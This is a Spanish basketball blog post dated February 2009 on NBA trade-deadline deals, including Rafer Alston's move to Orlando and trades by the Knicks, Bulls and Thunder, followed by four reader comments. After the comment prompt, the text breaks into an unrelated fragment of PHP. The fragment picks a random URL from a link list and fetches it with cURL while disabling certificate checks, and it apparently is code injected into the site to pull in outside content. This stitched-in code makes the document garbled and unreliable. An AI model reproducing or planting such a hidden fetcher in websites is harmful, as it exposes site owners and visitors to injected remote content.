Alston es el nuevo base de los Magic

20 de February de 2009 por txusma

No es que se hayan producidos finalmente pocos movimientos este viernes, último día para traspasar jugadores, pero es que después de todo lo que se rumoreaba la sensación de decepción es complicada de eliminar. Amare sigue en los Suns, lo mismo que Shaq; los Blazers no han conseguido a Vince Carter, ni a Tayshaun Prince, ni a Gerald Wallace y finalmente no han utilizado para nada el expiring de Lafrentz; Cleveland no se ha reforzado aún más; en San Antonio seguirán jugando los mismos. Al final la mayoría de rumores se han quedado en agua de borrajas.

Pero vamos a explicar lo que sí ha pasado: Lo más destacado tal vez es el movimiento de Orlando Magic que ante la baja para lo que resta de temporada de Jameer Nelson se han reforzado con el ex-base de los Rockets, Rafer Alston, en un movimiento más que necesario para ellos. En el traspaso, que ha sido a 3 bandas, los Rockets se han hecho con los servicios de Kyle Lowry y Brian Cook y Memphis se lleva una primera ronda de Orlando más Adonal Foyle y Mike Wilks (expirings ambos). Buen movimiento también para los Rockets a largo/medio plazo que se hacen a su vez con los servicios de un base joven y de calidad.

Otra franquicia que se ha movido mucho durante todo el día han sido los Knicks que poquito que poquito continúan añadiendo piedrecitas a su proyecto 2010 pero esta vez lo han hecho conseguiendo jugadores que si pueden aportar esta misma temporada e incluso la siguiente. Larry Hughes y Chris Wilcox han recalado en la Gran Manzana a cambio de Anthony Roberson, Jerome James y Tim Thomas por un lado y de Malik Rose por el otro. De un plumazo los Bulls se han desecho de un jugador que no iba a jugar mucho y que además era sabido por todos que no se encontraba a gusto en esta situación. A cambio consiguen un poco más de flexibilidad salarial de cara al año que viene y a un jugador como Tim Thomas, capaz de dar aún algún minuto de calidad. El caso de los Thunder, por otro lado, es cuanto menos curioso ya que han pasado de traspasar a Wilcox a cambio de Tyson Chandler a hacerlo a cambio de un jugoso expiring. Veremos que preparan de cara al verano que viene.

Y ahora una relación de otro traspasos menores que también se han producido:

Thabo Sefolosha (Bulls) ha sido traspasado a los Thunder a cambio de una primera ronda condicionada.
Minnesotta se ha hecho con los servicios de Shelden Williams y Bobby Brown de Sacramento a cambio de Rashard McCants y Calvin Booth.
– En un traspaso a 3 bandas, Sacramento se ha hecho también con los servicios de Will Solomon de los Raptors y éstos han incorporado al pívot de los Celtics Patrick O’Bryant a cambio de una segunda ronda condicionada del 2014.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    A Nelson lo dan como fuera de la regular season ¿no? Han hecho su trabajo los Magics tapando su hueco con lo mejor disponible, y si vuelve para play-offs habrán mejorado sensiblemente el banco.

      Citar

  2. Txusma dice:
    #2

    En un par de paginas que he consultado lo dan fuera para lo q resta de temporada. La verdad es que no sabia que la lesion era tan grave.
    Los Bulls creo que han hecho su trabajo: se han traido lo q necesitaban con Brad Miller (vale, no es Bosh, pero es un buen pivot), u njugador mas que valido como John Salmons y se han desecho de lo q le sobrabra: jugadores exteriores a cambio de flexibilidad salarial y alguna rondita. En general, estoy contento.
    Ah! Y los Knicks se han dado cuenta que no pueden llegar con un erial de equipo al verano de 2010 pq supongo q cualquiera estrella q se plantee recalar en la Gran Manzana querra ver como minimo un buen proyecto de futuro y la oportunidad de conseguir cosas importantes a corto/medio plazo.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sí, Nelson se operó ayer y estará varios meses de baja. No volverá hasta la temporada que viene. Creo que los Magic han llevado el tema con cierto secretismo para no parecer demasiado desesperados en las negociaciones.

    Sí, los Bulls hacen cositas, pero les sigue faltando un jugador referente ¿no? Llevan con el mismo problema varios años, tienen una buena plantilla pero falta un líder.

    Ojo a Mikki Moore y Joe Smith. Se comenta que ambos pueden ser cortados y los Celtics andan muy pendientes de ellos. Habrás tortas entre los grandes equipos por llevárselos.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    A mí me parece una buena copia de Rafer Alston, Nelson.

    Y a la inversa.

    ¿QUíen mola más, Moore o Smith?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>